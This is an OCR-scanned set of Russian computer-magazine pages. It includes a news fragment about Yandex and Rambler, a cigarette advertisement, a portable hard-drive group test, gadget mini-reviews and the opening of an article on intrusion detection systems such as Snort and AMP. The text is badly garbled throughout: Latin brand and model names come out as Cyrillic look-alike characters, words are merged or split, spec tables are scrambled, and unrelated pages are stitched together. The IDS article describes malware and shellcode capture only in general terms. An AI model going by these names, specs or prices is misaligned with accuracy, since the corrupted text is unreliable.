отдельно от него, бам Ра тЫег планируется «усилить алгоритмами боодіе», 
но о покупке всего «Рамблера» пока речи не шло даже близко, бфициально 
сделка будетзавершена в сентябре месяце и после этого уже станет ясно, не 
поторопился ли «Яндекс»с похоронами конкурента. 




Сатеі Ыаіигаі Ріаѵог — инновационный продукт, произведенный из цельного табачного листа. 
Отсутствие вкусовых добавок позволяет раскрыть естественный мягкий вкус высококачественного табака. 

Подлинный вкус и ничего лишнего. 








Сатеі ЫаіигаІ Ріаѵог. 
Природа возвращается. 






паіигаі Лаѵог 
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процессе тестирования один из жестких дисков использовался для текущих 



иужд тестовой лаборатории: переноса данных, обмена 



аилами между тесто 
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[в этом. Важно, что когда пришла пора отдавать винчесте 



ъі предоставившим их 
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ГИГАБАЙТЫ 
В КАРМАНЕ 



гмер средней флешки, и тенденция сохраняется, і юртати вные винчестеры деше-| 
Две ют не по дням, а по ча сам, активно прітоавляя в гигабаитах/Бьем ся о закладЛ 
Рговолижаишие гбд-два, мобильные жесткие диски имеют все шансы отхва-| 



дтить немалую долю рынка у любых друг их носителей. л 



Ш:: МЕТОДИКА ТЕСТИРОВАНИЯ 

Ничего принципиально нового в методику тестирования жестких дисков мы 
вносить не стали. Каки раньше, прогоняли утилиту ЕЮ ТасЬ версии 3.0.4. 0, 
измеряя время случайного доступа, максимальную, минимальную и среднюю 
скорости чтения. Чтобы подстраховаться от неверных выводов, каждый жест- 
кий диск испытывался четыре раза, после чего высчитывался средний показа- 
тель, который и становился финальным результатом. Для уточнения данных мы 
прогоняли встроенный в пакет Еаѵазуз ЕѵегезШШтаІе4.5 бенчмарк. 
Помимоэтого, мытакже проводил и тест с использованием ноутбука, отклю- 
ченного от сетевого питания. Бывает, что портативный жесткий дискотка- 
зывается работать втакихусловиях. Ксчастью, с нашего тестового ноутбука 
АсегТгаѵеІМаіе 6292-81 2625Мп — обычного лэптопа среднего класса — все 
накопители запустились без проблем. При этом никакой разницы в произво- 
дительности не наблюдалось: результаты были одинаковые как на тестовом 
стенде(см. конфигурацию), таки на ноутбукесотключенным и включенным 
сетевым питанием. 

Разумеется, мы не забыли уделить внимание внешнему виду носителей. Но на 
итоговую оценку, в первую очередь, влияла скорость и стабильность работы, 
которая видна по графику чтения: чем меньше резких взлетов или падений 
производительности, тем лучше. 



Ш АЛЬТЕРНАТИВА 

Как ни крути, но главный параметр жесткого диска — скорость вращения шпин- 
деля. Большинство предлагаемыхсейчас мобильных накопителей сделаны 
на базе емких, но отнюдь не рекордно быстрых накопителей. Значительного 
увеличения скорости можно добиться приобретением винчестера с частотой 
вращения шпинделя 7200 об/мин. Если найти та кую модель в продаже не 
удается, рекомендуем отдельно приобрести внешний 2.5-дюймовый бокс и сам 
накопитель. К примеру, 160 Гб Ещ'Ези МНѴѴ2160ЕЕІ обойдется примерно в 3600 
рублей, а мобильное шасси — в450 рублей. Правда, тебе лучше внимательно 
почитатьтесты подобных устройств: далеко не все из них обеспечивают ста- 
бильно высокую скорость чтения; многие построены на неудачных чипах и будут 
сильно затормаживать работу системы и винчестера. Нохороший бокс практи- 
чески ничем неотличается отфирменныхдехжеТгапзсепсІ, Махіог, ІаСіе. 



ТЕ5Т_І_АВ ВЫРАЖАЕТ БЛАГОДАРНОСТЬ ЗА ПРЕДОСТАВЛЕННОЕ 
НА ТЕСТИРОВАНИЕ ОБОРУДОВАНИЕ ИНТЕРНЕТ-МАГАЗИНУ 
ОІОІТАЬБНОР.Ки (ТЛ495) 730-7758), А ТАКЖЕ РОССИЙСКОМУ 
ПРЕДСТАВИТЕЛЬСТВУ КОМПАНИИ МАХТОК 
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Іпіеі Соге 2 Ехігете 0X96501 



[Системная плата: М5І Х38 Оіатопсі| 



|Память, Мб: 2х 1024 Мбайт, Согзаіг РРРЗ 1066 МП. 



[Видеоплата: А51І5 ЕМ880065| 



'есткий диск, Гб: 400, Зеадаіе Ваггасиба 7200 об/мин, 5АТ/ 



[Блок питания, Вт: 450 Вт, Г[о5іоп| 



Список протестированного о борудования 

ІаСіе тоЬіІе Л з к 3 2 О О Ь 

Махіог ОпеТоисб 4 Міпі 250 



ІТгапзсепсІ Зііо ге 0 еі 1 20 ѲЬ| 



^е гбайт РоііаЫе Ьагсісігіѵе 320 ОЬ| 



[ѴѴР Раззрогі РогІаЫе 320 6Ь| 




ІаСіе тоЬіІе сіізк 320 6Ь 

Технические характеристики 



§§есткий дискБатзипд НМ320ІІ 

Интерфейс: 5 Щ^ГО^ ШЬійійіІ|Зд В^ШЩі ешінЩІ! 

І^ШШИНИШІВІШІІ і я : ІЛЙМШИІ 
кШіШ : 8 Мб 

Размеры и вес: 81x128x15 мм; 170 г 
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Компания ІаСіе давно славится гигантскими внешними накопителями, 
но рынокзаставил включить в линейку продукции и мобильныежесткие 
диски. Результат удался: новинка выглядитаккуратно, корпус выполнен из 
качественного металла, сборка безупречная. В качестве поставщика жест- 
ких дисков была выбрана компания Затзипд. Это смело можно отнести к 
плюсам, таккакмодель НМ320Л неплохо себя зарекомендовала в сводных 
тестах портативных накопителей. Наши измерения это подтверждают: 
кривая чтения практически лишена сколько-нибудь значимых скачков, 
несмотря на то, что средняя скорость высока. 




Наиболее быстрые среди тестируемых дисков: Махіюг ОпеТоисИ 4 Міпі 250 
Об и ІаСіе тоЬіІе сіізк 320 6Ь 




Махіог ОпеТоисЬ 4 Міпі 



[Технические характеристики 



Жесткий диск: 

ІіеМ ИШШ : 5 ШАІ(в н1тр ейШ^ 

Скорость вращения: 5400 об/мин 
ШШШ 8 Мб 

Размеры и вес: 81x15x124 мм;1б7 г 
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Главный призер нашего теста — не самый емкий, не самый дорогой и не 
самый пафосный. Зато потехнической части он немного, но опережает 
своих конкурентов. 

В первую очередь отметим четкий графикчтения, причем — с неизменно 
высокой скоростью. Потестовым данным винчестертакже лидирует, осо- 
бенно по параметру времени случайного доступа. 

Выглядит призер неброско, но приятно: заключен в алюминиевый бокс 
фирменного дизайна с окантовкой из прорезиненного пластика. 
Наконец, цена удевайса относительно невысока, что мы также относим к 
достоинствам. 



0 

Из недостатков отметим высокую цену: вполне можно найти более эконом- 
ные варианты, не потеряв при этом в скорости или объеме. Аесли выбирать 
дискдля архивных данных, игнорируя скорость, то ассортимент доступных 
моделей вырастет в разы. Трудно похвалить и весьма скромную внешность 
Эагшзипд НМ320Л. Для дорогого продукта было бы неплохо придумать хотя 
бы парочку отличительных особенностей. 



0 

У этой модели трудно выискать недостатки. Та же куцая внешность с лихвой 
компенсируется практичностью. Мы уверены, что несколько не самых лег- 
ких падений винчестер переживет без каких-либо последствий. 
Единственное пожелание: хотелось бы большего ассортимента моде- 
лей, тем более учитывая, что компанией Махіюг владеет флагман рынка 
— Зеадаіе. 
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МАКСИМАЛЬНАЯ СКОРОСТЬ, МБ/С 



ВРЕМЯ СЛУЧАЙНОГО ДОСТУПА, МС 



ѴѴй Раггрог1320СЬ 

ѴегЬаІіт РогіаЫе 
ИагсЛсІгіѵе 320 СЬ 
Тгапзсепсі 
51оге^И20 6Ь 

Ргезіідіо Баіа 
Ба^е II 320 ОЬ 

МахІогОпеТоисИ4 
Міпі 250 6Ь 

ІаСіе тоЫІе сіізк 
320 СЬ 



Макси- 

мальная 

скорость, 

Мб/с 



I 



охоже, все диски уперлись в пропускную способность интерфейса: разни 
фактически отсутствует 



ѴѴБ Раззрог1320СЬ 

ѴегЬаІіт РогІаЫе 
Ьагсісігіѵе 320 СЬ 

Тгапзсепсі 

51оге^П20СЬ 

Ргезіідіо йаіа 
Ба^е II 320 СЬ 

Махіог ОпеТоисЬ 4 
Міпі 250 СЬ 
ІаСіе тоЬИе сіізк 
320 СЬ 



Время случай- 
ного доступа, 



6 8 10 12 14 16 18 20 



Каквидно по времени случайного доступа, лидирует МахІогОпеТоисИ 4 
Міпі 250 ОЬ; результаты остальных дисков очень близки друг кдругу 





Ргезіідіо Раіа 5аіе Щ 
РазЫоп ЕсШіоп 3 20 6Ь 

Технические характеристикш^^^^И 



: ТозЫЬа МК32 52 СБХ 

Интерфейс: 

ІМШВДІІІИІШІі я МЙЁШШШШ 
Буфер: 8|Щ 

Размеры и вес: 81x17x131 мм; 300 г 




51оге^Н20 ОЬЩ 

Технические характеристики^ 



Жесткий диск: ТозІііЬаМКі 252 б 5 Х 

Интерфейс: БАТА (внутренний), ІІБВ 2.0 (внешний) 

Буфер: 8 Мб 

Размеры и вес: 79*9x13x129 мм; 135 г 
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Хотите создать самый дорогой телефон или компьютерную мышку?Тогда вам 
не стоит гнаться за современными технологиями, лучше облить девайс зо- 
лотом и украсить камнями. Рекорд будет поставлен, можно не сомневаться. 
Будут и заказы — со стороны арабского полуострова и российской элиты. 
Если подобный подход объясним в случае с автомобилями или предметами 
роскоши, то золотой мобильный жесткий диск выглядит по меньшей мере 
странно. Единственным значимым преимуществом мы считаем аккуратно 
собранный «псевдо-кожаный» корпус. Благодаря нему, при падении шансы 
преждевременной смерти накопителя уменьшаются. 



0 

Стоит «золотистое счастье» в два раза дороже любой другой модели. На 
наш взгляд, необычный накопитель должен быть выполнен в ЬІ-іесЬ стиле, 
например, как Тгапзсепсі ЗіогеТеС а выбранный в этом случае дизайн мало 
уместен. К сожалению, два чехла и цепочка, идущие в комплекте, не смогли 
улучшить финальную оценку. Вдобавок, кривая чтения заметно ниже, чем у 
конкурентов (хотя и без явных провалов в графике). 



т 



Кульминация нашего сравнения мобильных жестких дисков с флешками — 
за стоимость этого 1 20-гигабайтного диска можно купитьлишьсредненькую 
флеш карточку на 4 гигабайта! А если учесть все доводы в пользу винчесте- 
ров, что приводились в начале статьи, может быть, многим действительно 
больше подойдет чуть более громоздкий, но куда более емкий накопитель. 
Тгапзсепсі 5*ое.М привлекает необычным дизайном, выполненным с лег- 
ким кивком в сторону недавних новинок Ыокіа. Приэтом выглядитдиск при- 
влекательнее многих других моделей. Накопитель используетжесткий диск 
ТозЫЬа со скоростью 5400 об/мин. Кстати, заменить винчестер можно бук- 
вально за пару минут: верхняя часть корпуса отвинчивается и, сняв планку 
со стандартным 5АТА-интерфейсом, можно установить любой другой нако- 
питель — например, со скоростью вращения 7200 об/мин. Получившиеся у 
нас графики чтения достаточно четкие, правда, в начале наблюдается неко- 
торый всплеск производительности. 



0 

Ксожалению, 5*оге.М не может похвастаться практичностью: корпус выпол- 
нен из пластика, хоть и очень жесткого. Допустим, он сможет предохранить 
накопитель от легких падений, но от царапин — точно не спасет. 
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ѴегЬаІіт РогІаЫе 
Иагсісігіѵе 320 6 Л 

Технические характеристикиД 



5 №А11Гвк\СТоРве^ 

Скорость вращения: 5400 т/шт 
Буфер: 8 НВ 

Размеры и вес: 86 x 137 x 16 мм; тт 

•••••••ООО 
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Всемирно известный производитель всевозможных сменных накопителей, 
расходных материалов и еще сотни наименований обновил свою линейку 
мобильных накопителей. В плюсы можно записать стабильные и достаточно 
высокие результаты тестов, отсутствие скачков производительности в гра- 
фике и очень низкую для своего класса цену. Если есть необходимость в ем- 
ком, но недорогом накопителе, то ѴегЬабт РогіаЫе Нагббгіѵе 320 ѲЬ — один 
из приемлемых вариантов. Но — не лучший. 
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А не лучший он по причине откровенно дешевого и ненадежного пластико- 
вого корпуса. Мы не стали проводить краш-тест, но уверены, что падение на 
жесткую поверхность спокойно принесет несколько трещин и через какое- 
то время девайс просто развалится на части. На фоне стильных аналогов 
крайне неприятно наблюдать скрипящий корпус неопределенной формы 
типичного серебристого цвета. Поэтому лучшим решением длятех, кто хочет 
сэкономить на покупке внешнего мобильного накопителя, будет приобрете- 
ние отдельно корпуса и отдельно — жесткого диска требуемой емкости. Пусть 
подобратьбыстрое и беспроблемное шасси нетакпросто, зато алюминиевый 
корпус спасет накопитель при падении и прослужитзначительно дольше. 



^0_Ра55рогІРогІаЬІе 

ТехннческиехарактериетикиДІ^^Н 



ЙМЯИВ :: 

Интерфейс: БАТА (внутренний), 115В 2.0 (внешний) 

ІМ'ііЦйігмІіі' ііЬМІЬУІІІі я 
Буфер: 8 Мб 

шш 
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ѴѴезіегп Оідііаі довольно давно и весьма успешно развивает свою линейку 
внешних накопителей. От этой модели вполне стоит ждать хороших резуль- 
татов: один из ведущих производителей жестких дисков всегда комплекту- 
ет свои внешние модели качественными винчестерами. Наши тесты диск 
прошел без запинок, с хорошими результатами. В общем, у ѴѴБ получился 
отличный накопитель за разумную цену. За это и вручаем награду «Лучшая 
покупка». 



0 

Глянцевая поверхность моментально покрывается отпечатками пальцев, а в 
ком плекте даже неттря почки. Компания предлагает целый набор различных 
чехольчиков для накопителя. Правда, их придется заказывать и оплачивать 
отдельно. 




н ВЫВОДЫ 

За редким исключением накопители показывают стабильные и доста- 
точно высокие результаты тестов. К слову, даже кривоватый график 
чтения (5-10% отклонений) вряд ли будет заметен на глаз, особенно при 
копировании больших объемов данных, состоящих из множества фай- 
лов. Те мнемен ее, производители позволяют себе чересчур фривольно 
обращаться с ценами нас вою продукцию. К примеру, если предпо- 
ложить, что скоростные да иные примерно равны, то следующим по 
важности параметром будет емкость. Получается, что за «оригинальный 
внешний вид» многие производители не стесняются просить столько 
же денег, сколько за вдвое более емкий винчестер. На наш 



взгляд, первым делом надо обращать внимание на объем и скорость, а 
во вторую очередь — на материал корпуса. Переплачивать же за форму, 
кожаные вставки и прочие рюшечки — не имеетсмысла. 

Из выбранных нами шести накопителей определились двое победите- 
лей. Махіог ОпеТоисЬ 4 Міпі 250 Об — емкий накопитель на основе быс- 
трого и надежного винчестера Зеадаіе. Что важно, его цена полностью 
адекватна, в отличие от многих конкурентов. 

«Лучшая покупка» определенно достается стильной новинке от ѴѴБ 
— разумеется, нами были учтены достойные результаты тестов и прият- 
ный внешний вид. п г 
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4 девайса = 




ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ 



ІІ9НІБ6В&ВІІ1 

Дисплей:ТРТ, 2Цйма, 320x240 пикселей 



4500 руб. 

за 8 ГБ модель 



О 




СуЬог§ Соптапсі ІІпіІ: 

Странный киборго- 
подобный манипулятор, 
который заменит 
геймерам клавиатуру 



1990 руб. 



Плееры от ігіѵег всегда отличались высоким качеством звука, приемлемы- 
ми ценами, продуманным интерфейсом и поддержкой кучи разных фор- 
матов, включая альтернативный ОѲѲ и ряд других. При работе над новым 
плеером Е100 специалисты ігіѵегуделили большое внимание и внешнему 
виду девайса. Результат получился отличный: устройство выглядит стильно 
и качественно. На выбор предлагается пять вариантов расцветки корпуса 
(хоть под цвет костюма, хоть под цветтуфелектвоей подруги). 

Среди других особенностей модели — 2,4-дюймовый дисплей, на котором 
можно смотреть видео форматов МРЕѲ, ѴѴМѴ9 и XV Ю и читать текстовые 
файлы; слот расширения для карт памяти тісгобй, который пригодится при 
нехватке свободного места на встроенной флеш-памяти (плеер можетбыть 
укомплектован 2, 4 и 8 Гб); встроенные стереодинамики на задней панели 
девайса. Интерфейсуправления построен на системе 0-СІіск и обещает 
порадоватьудобством и простотой. Ну и, в лучшихтрадициях ігіѵег, плеер 
поддерживает форматы ПАС, МРЗ, ѴѴМА, А5Е и 066. 



|Купить: \л/\л/\л/.зта гІ-та55Ѳ5 лчГ 



То, что это клавиатура, а не пультуправления механическим монстром, сра- 
зу и не поймешь. Хотя к клавиатурам устройство относится лишь формаль- 
но. Называется оно СуЬогд боттапб СІпіС Манипулятор оснащен двумя 
десятками программируемых клавиш и четырехпозиционным джойстиком 
(под большой палец). Клавиши полностью программируемы, а для сохра- 
нения параметров от разных игр в наличии — возможность переключаться 
междутремя режимами. Также клавиши оснащены приятной подсветкой, 
цвет которой меняется в зависимости от выбранного режима. Под большим 
пальцем, помимо хэта, имеются две клавиши, заменяющие «пробел» на 
обычной клавиатуре. Расположены они на специальной панели, которая 
легко регулируется под твою руку. Манипулятор подключается по разъ- 
ему 115В и умеет работать как под Виндусами, так под Линуксом и Маком, 
бтличное оружие для виртуального смертоубийства, особенно в комплекте 
схорошей игровой мышкой! 
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А8118 Еее РС 901 

Субноутбук от Азиз, 
оснащенный отличным 
экраном, камнем и 
батареей 



600 $ 



Новая модель популярного субноутбука А51І5 Еее РС немного противоре- 
чива. С одной стороны, в ней довольно много плюсов: процессор Іпіеі Аіот 
1 ,6 6 Н 2 ; отличная батарея, способная, не напрягаясь, прожить 5 часов 
с включенным ѴѴІ-РІ; наконец-то, встроенный модуль ВІиеІооіЬ. Но ноут 
вырос в размерах, потяжелел и немного прибавил в цене. Теперьэтоуже не 
супер-дешевый субноут, а вполне мощная портативная машинка на чипсе- 
те ІпІе194565Е, который способен потянуть интерфейс Ѵізіа Аего. Модель 
оснащена традиционным ярким экраном диагональю 8,9 дюйма и разреше- 
нием 1 024x600, встроенным модулем ѴѴі-Рі, поддерживающим 802.1 1 п, 1 ѲЬ 
оперативной памяти и 1 ,3-мегапиксельной камерой. В качестве операци- 
онной системы может вы ступать Ха п б го з І_іпих или ѴѴІпбоѵѵзХР (при этом 
объем встроенной 550-памяти будет разным). Версия с Виндой получит 1 2 
Гб диска, а пингвино-поклонникам достанутся все 20 Гб. Несмотря на при- 
бавку в весе, серия остается отличным инструментом для не напрягающего 
вардрайва по обросшему ѴѴі-ГІ-точками городу. По слухам, в России новая 
версия поступит в продажу ближе косени. 



8о1аг СІоЬеТгоПег Кіі 

Портативная солнечная 
батарея для хардкорных 
техноманьяков, оказав- 
шихся в лесу 



Специально для тех, кто любитходить в походы, но страдаетжесткой 
компьютерной зависимостью, разработан комплект5оІагѲІоЬеТгоиег КІС 
В комплект входитзарядное устройство Ргееіоабегс чехлом, 1 1 различных 
адаптеров, провод зарядника и ІІ5В-кабель. Солнечную батарею можно 
повесить на рюкзак, растянуть на велосипеде, закинуть на дерево или 
просто разложить на солнцепеке. Для полной зарядки понадобится 4 часа 
ясной погоды. После этого можно запитать мобильник на 44 часа, іРоб на 
18, Р5Р на 2,5 и КПК— на 22. Если с солнцем в этот день случился промах, 
то с помощью ІІ5В-кабеля можно втихаря подзарядиться от ноутбука 
друга. Весь комплектустойчив к различным непогодам и веситжалкие 200 
граммов, которые всегда можно взять с собой ради ночного рубилова в 
Р5Р под открытым небом. За фиксацию на всяких рюкзаках и транспортных 
средствах отвечаютспециальные ремни Ѵеісго. Они надежно фиксируют 
комплект, чтобы потом не пришлосьза ним возвращаться. 
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ВЕТВЬ 



ОБОРОНЫ 



КТИВНАЯ ЗАЩИТА ПРОТИВ ВИРУСОВ 



Антивирусные пакеты сильно тормозят и часто оказываются просто беспо- 





лезными. Тем временем свежая малварь, еще не попавшая в базы, наступает 


огромной армией и обещает сожрать все данные, ни разу не подавившись. 




Зачастую не спасают и файрволы. Реально действующие защитные комп- 






лексы до сих пор были доступны лишь крупным провайдерам. Но теперь и 





они идут в массы. 

юди верят в антивирусы, и, хотя антивирусы им не очень-то 
помогают, они уже давно стали непременным атрибутом 
безопасности. Даже — со старыми базами месячной давности. 
Антивирусная индустрия, изначально ориентированная на 
отлов вирусов, которые разрабатываются месяцами и внедряютсвою, 
возможно, измененную копию в исполняемые файлы, распространяемые 
через дискеты, ВВ5 или первобытные компьютерные сети типа РЮО, оказа- 
ласьтупиковой ветвью эволюции. Она паразитирует на вирусах и обречена 
на вымирание. Агонию мы можем наблюдать уже сейчас. 

Вирусы изменились! Точнее, исчезли, уступив место компьютерным 
червям, появляющимся чуть ли не каждый день, написанным на С/0ЕІ_РНІ/ 
Ѵіыіаі Вазіс’е, ни в какие файлы не внедряющимся и зачастую обитающим 
исключительно в оперативной памяти. Руткиты и почтовыетроянские кони 
— это для детишек. Нормальная мальварь похожа на крылатую ракету. 
Быструю, стремительную, накрывающую цельточечным ударом и само- 
уничтожающуюся в случае неудачной атаки. Действительно, какой смысл 
торчать на машине, если пароли вместе с электронными деньгами уже ушли 
в неизвестном направлении и червь можетсмелоделатьсебе харакири. 
Благо, пока все дыры не заткнуты, он, в случае необходимости, будет прихо- 
дить вновь и вновь. 



Участники рынка антивирусов испытывают серьезные проблемы с поис- 
ком образцов свежей малвари, покупая ее за нехилые деньги утого же 
ѴігивТоіаГа или КІогтап'а. Наглядный тому пример — РизІоск.С. Когда одни 
компании (имеющие связь с миром андеграунда) уже выпустили лекарство, 
другие (такой связи, очевидно, не имеющие) — лихорадочно пытались 
за получить хотя бы один рабочий образец. А смысл? По данным компаний, 
владеющих распределенными сенсорными сетями, эпидемия рустока 
завершилась еще до выпуска лекарства в свет (по другим данным — спустя 
несколько дней после его выхода). Русток сделал свое дело, подняв бот-нет, 
прокачавший через себя нехилый объем хакерского трафика, после чего 
осел в частных коллекциях, ну и в антивирусных базах. О! Как круто ловить 
вирус, который можно встретить разве что на ѵѵѵѵѵѵ.ойепБіѵесотриІіпа.пеІ . 
да и то — после предварительной регистрации. 

Н Ш5ИІР5 

Новое времятребуетновых решений. Пионерами борьбы счервями (и 
зловещими хакерами) стали системы обнаружения вторжений, ониже 
Ігйгисіег йе^есйоп Зузіет или, сокращенно, Ю5. В отличие от анти вирусов 
и рго-активных механизмов, работающих с файлами и хучащих операцион- 
ную систему, так что она постоянно сваливается в голубой экран смерти, 

Ю5 поступает совсем нетак. Ю5 садится на интерфейс, прогоняя через 
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Схематическоеустройствотипичной системы обнаружеі 
вторжений 

себя весь входящий/исходящий сетевойтрафик, и через специальную 
базу «правил» (фактически, тех же самых сигнатур) ловит подозрительные 
пакеты или детектитспецифичную сетевую активность. Естественно, сиг- 
натуры необходимо обновлять, иначе ЮБ ни хвоста не сможет распознать, 
и сигнала тревоги мы неуслышим. Агде ихбрать, эти сигнатуры? 
Пополнение сигнатур осуществляется из двух основных источников. Пер- 
вый — Ьопеу-роі’ы — «горшки с медом» или «капканы» для червей, реали- 
зованные на базеумышленно незащищенных компьютеров (виртуальных 
машин) с кучей дыр, куда малварьустремляется толпами. Конечно, воз- 
буждая специально сконструированную систему сенсоров, тутже «выцара- 
пывающих» червей изТСР/ІР-потока и забрасывающих их в сигнатурную 
базу, в результате чего остальные узлы, оснащенные ЮБ, автоматически 
распознают мал варь и поднимают администратора по тревоге. 

Второй источник— ручной анализ свежих дыр с ручнымже созданием 
регулярных выражений, описывающих практически все возможные комби- 
нации зловредного кода. Благодаря чему, малварь еще не написана, а уже 
есть в базе! И это никакая не эвристика, а конкретная сигнатура (точнее, 
набор сигнатур), которую нетак-то просто обломать, особенно с учетом того, 
что рядовым пользователям сигнатуры недоступны и лицензируются только 
крупным компаниям по подписке за деньги. 



НЕХ-дамп атакующего Де 11-кода с возможностью скачки на компьютер в 
бинарный файл 

при наличии последнего просто не нужен. Ну разве что достался в подарок 
от производителей сетевых девайсов. 

Кстати, о подарках. С некоторого времени Ю5/ІР5 стали встраиваться в 
персональные брандмауэры, точки беспроводного доступа, модемы ит.д. 
Качество встраиваемыхзащит крайне невелико. Доступа ксигнатурным 
базам (за редким исключением) они не имеют, а потомуловяттолько клини- 
чески устаревшую малварь, которая используеттиповые сценарии атаки, 
разработанные несколько леттому назад. 

Ю5/ІР5, встроенные в «промышленные» маршрутизаторы отСІБСО, 
работают намного лучше. Точнее сказать, СІ5С0 ІР5 работает, эта штука, 
что встроена в персональный брандмауэр, только набиваетсебе цену. До 
недавнего времени Ю5/ІР5 стоили очень и очень дорого, что, в конечном 
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Локальные антивирусы с эвристическими анализаторами на борту доступ- 
ны всем желающим. Прежде, чем выпускать червя в Сеть, хакеры много- 
кратно прогоняютего через кучу антивирусов, совершенствуя код, пока все 
эвристики незаткнутся. Собственно, потому эвристический анализ и не 
работает. Даже если эвристик настолько крут, что ловит 99,996% еще неиз- 
вестной малвари, то оставшихся 0,004% вполне достаточно для эпидемии 
глобальных масштабов. 

По большому счету, качество детекции у ЮБ ничуть не выше. Но недоступ- 
ность коммерческих реализаций и невозможность«обкатки» малвари 
погружают хакера вотьму, вынуждая его действовать наугад и наступать 
на заботливо расставленные капканы и грабли. Обойти все может разве 
что ясновидец илиже... непосредственно сам разработчик ЮБ. Нитех, ни 
других среди хакеров не наблюдается, а потому ЮБ’ы рулят. 

Главным (и, пожалуй, единственным) недостатком ЮБ’ов является их 
пассивность. Они словно посторонние наблюдатели, распознающие втор- 
жение и не предпринимающие никаких мер по его предотвращению, хотя с 
технической стороны заблокировать трафик — раз плюнуть. Так почему же 
ЮБ’ы этого не делают? Причина в огромном количестве ложных пози- 
тивныхсрабатываний. При простой записи в лог— проблем не возникает 
(администраторы любят анализировать длинные логи), а вот блокировка 
трафика из-за каждого пустяка превращает ЮБ в замечательное средство 
для БоБ-атак. Его даже атаковать не нужно. Он и сам с перепугу замурует 
все входы/выводы, словив совершенно честный пакет. 

Когда же ЮБ достигли приемлемого качества распознавания атак, ихтутже 
переименовали в ІР5 (Іпігисіег РгеѵепІіопБузІет) — «Системы Предотвра- 
щения Вторжений». Базовые принципы работы остались неизменными. 
Старые продукты под новой торговой маркой — ясное дело, чтобы срубить 
с пользователей побольше бабла. А что? Некоторые ставят одновременно 
и ЮБ, и I Р5, хотя, по сути дела, ЮБ реализует подмножество функций I Р5 и 



счете, привело к появлению аналогов от независимых производителей 
(спрос рождает предложение). Из них мы рассмотрим два наиболее извес- 
тных продукта: коммерческий АМР (Асііѵе Маіѵѵаге Ргоіесііоп) от Епбеаѵог 
БесигБу и открытый проектБпогІ. Сравним их сильные и слабые стороны. 

г быокт 

Система обнаружения вторжений по имени Бпогі (с логотипом свиньи с в-о-о-от 
такими ноздрями) позиционируется какОрепБоигсе-проект. И сходные тексты 
можно влюбой моментскачатьс официального сайта ѵѵѵѵѵѵ.зпогЕогд .Тамже 
можно найти и многочисленные порты подлюбые системы: отХР до прошивок 
ОББ-модемов и беспроводныхточекдоступа. Правда, сустановкой придется, 
мягко выражаясь, попыхтеть. Юзабельность — на уровне черного экрана команд- 
ной строки. Системы генерации отчетов в удобочитаемом виде«какбы есть», но 
пользы от них немного и сквозь отчет приходится продираться, какчерез оккупи- 
рованную хрюшками свинофабрику. Приходится закачивать с то го же интернета 
дополнительные программы и собственноручно обустраивать линию обороны. 
При всей известности и даже открытости этого проекта, естьу него один 
большой (по крайней мере, для нас) недостаток. Без сигнатурной базы 
Бпогі практически бесполезен, а за доступ кбазе надо платить. За годовую 
подписку нужно выложить от $30 до $500 — в зависимости от количества ус- 
тановленных сенсоров и потребностей. Без подписки зарегистрированные 
пользователи (то есть, халявщики) получаютсигнатуры через 30 дней — по- 
рядком протухшие и не сильно полезные. Ведь последнее время вспышки 
вирусной активности носят кратковременный характер и через 30 дней 
вирусная агрессия, как правило, сходит на нет. В Сети наблюдается лишь 
мелкая остаточная «рябь». В итоге, незарегистрированные пользователи 
получаютсигнатуры по мере выхода новых релизов БпогГа и поражаются, 
как эта штука стала стандартом де-факто в мире открытых ЮБ?! Она же 
совсем не работает! 
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Панель ѴѴЕВ-интерфейса по управлению АМР 

* I - 




^ *'^^^*»Открытость ЭпогЕа еще не подразумевает его бесплатность 




О 



Бесспорно, среди открытых проектов — Бпогі: 
лучший. Он детально описан в десятках книг, спектр 
целевой аудитории которых распластался от чайников до 
администраторов, самостоятельно пишущих сигнатуры (или, 
втерминахЗпогЕа, — «рулеза» отанглийского гиіев.то есть 
правила), вместо того, чтобы лицензировать уже готовыеу 
ведущих поставщиков. 

Н АМР 

Основной конкурент ЭпогЕ а — это Асйѵе Маіѵѵаге Ргсйесйоп 
от ЕпсІеаѵогБесигйу ( ѵѵѵѵѵѵ.епсіеаѵогвесигііѵ.сопп ). Коммерчес- 
кий продукте дружелюбным интерфейсом и потрясающими 
возможностями, приправленными качественно сконструиро- 



> СІѴСІ 

На нашем дискеты 
найдешь упомянутые 
в статье материалы, 

а также бонусы кним. ваннымии тщательно отлаженными сигнатурами, дающими 



минимум ложных срабатываний. Последнее позволяет 
использовать АМР и как Ю5, и как ІР5. Полный аппаратно- 
программный комплекс стоитпорядка $13000, причем не«во- 
обще»,аза год. Полицензии. Ачто, для крупных І5Р — вполне 
подъемная сумма, окупающая себя за счет подавления 
«паразитного»трафика, создаваемого червями, ботнетами и 
прочей нечестью. 

Какже быть рядовым пользователям? Мыщъхубедил руко- 
водство компании создать бесплатную демонстрационную 
версию с ограничением по количеству малвари, детекти- 
руемой в единицу времени. Скажем, не более 1 00 червей в 
день, что для большинства из нас более чем достаточно! Даже 
в разгар эпидемий компьютер автора пытаются атаковать 
примерно раз в полчаса. А значит, у нас — двойной запас по 



Хроника пикирующего 
бомбардировщика 

Помимо локальной копии, фиксирующей атаки на заданный узел, пользователи 
АМР получают бесплатный доступ к демонстрационному аккаунту, который, 
пускай и с ограничениями, отображает текущую статистику вторжений в 
реальном времени. Очень полезная штука для анализа вирусной активности. В 
частности, 16 июля 2008 года произошел взрыв. Нет, не ядерный. Просто резкая 
и непонятно чем обоснованная вспышка вирусной активности, сошедшая на нет 
уже через несколько дней. 

АМР позволяет не только наблюдать за вирусами, но и скачивать образцы, 
отловленные распределенной сетью Ьопеу-роЕов — не только вирусов, атаку- 
ющих наш узел, но и всех пойманных вирусов вообще ! Лучшего средства для 
пополнения частных вирусных коллекций, пожалуй, и не придумаешь. Правда, 
не все так радужно. Больше половины малвари «вытягивается» в сильно побитом 
состоянии. Есть голова, но нет хвоста. Или же, наоборот, червь длиною в 9.6 Кб, 
захваченный вместе с посторонним трафиком, вырастает до мегабайтных раз- 
меров, что, естественно, затрудняет анализ. Впрочем, учитывая, что количество 
пойманных штаммов одного и того же вируса исчисляется сотнями, всегда мож- 
но «выдрать» наиболее качественный экземпляр, с которым уже и работать. 

Но червей можно и на ѵ\лллл/.о11еп5Іѵесотригіп§.пеі: найти. Уникальность АМР в 
том, что она ловит (и позволяет скачивать для исследования) еще и зііеіі-коды. 

То есть, атакующие компоненты червя, вызывающие переполнения буфера и 
загружающие «хвост», чаще всего реализованный в виде обычного ехе/сШ/зуз- 
файла. Реже — чего-то сильно необычного и без загрузчика практически не 
